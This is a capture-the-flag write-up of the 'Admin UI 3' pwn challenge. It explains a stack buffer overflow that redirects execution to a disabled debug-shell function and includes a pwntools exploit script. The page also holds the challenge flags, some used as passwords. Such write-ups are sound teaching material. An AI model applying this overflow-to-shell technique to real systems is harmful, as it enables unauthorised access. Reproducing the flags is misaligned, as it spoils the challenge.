ctftime

My solutions for various CTF challenges

View on GitHub

../

ADMIN UI 3

pwn-re

The code quality here is terrible. Even the temperature scale is measured in “Kevins”. Just bad Q/A all around here. If they choose to measure in Kevins rather than Kelvins, then it’s a sure bet that they can’t handle their memory properly. It looks like this also controls the SmartFridge2000 internal temperature for that whole home “just-works” experience.

Now, with having service access, we get a pseudo shell and we can enter debug, that prints out the vmmap, and shell that should spawn a real shell, but was disabled.

Here, we can overflow the buffer and control the RIP to jump to the _Z11debug_shellv symbol, that the shell command should actually call.

Exploit script

from pwn import *

e = ELF('admin-ui')

p = remote('mngmnt-iface.ctfcompetition.com', 1337)

p.sendline('1')
p.sendline('CTF{I_luv_buggy_sOFtware}')
p.sendline('CTF{Two_PasSworDz_Better_th4n_1_k?}')

p.sendline('A' * 56 + p64(e.symbols['_Z11debug_shellv']))
p.sendline('quit')
p.interactive()

Then we find another flag file, namely an0th3r_fl44444g_yo.

flag: CTF{c0d3ExEc?W411_pL4y3d}